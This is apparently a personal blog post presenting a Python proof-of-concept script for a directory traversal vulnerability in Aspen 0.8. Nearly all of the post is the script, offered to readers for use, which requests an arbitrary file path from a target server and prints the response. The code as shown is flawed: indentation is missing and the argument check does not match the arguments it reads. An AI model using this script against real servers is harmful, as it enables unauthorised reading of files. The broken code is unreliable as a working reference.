Hi,
when I was reading a seclist.org I found a vulnerability in Aspen described by Daniel Ricardo dos Santos.
Below is a little proof-of-concept code. Maybe you will find it usefull. ;)
#!/usr/bin/env python
# aspen 0.8 directory traversal found by Daniel Ricardo dos Santos
# simple poc by : http://HauntIT.blogspot.com
#
import sys
import urllib
if len(sys.argv) < 2:
sys.stderr.write('usage: localhost /file/you/wanna/check')
sys.exit(1)
else:
testbug = sys.argv[1]+':80'+sys.argv[2]
print testbug
sock = urllib.urlopen(testbug)
response = sock.readlines()
i=0
print 'Testing: ',testbug
for line in response:
i+=1
print line
Good Job Daniel! ;)
Cheers o/
No comments:
Post a Comment
What do You think...?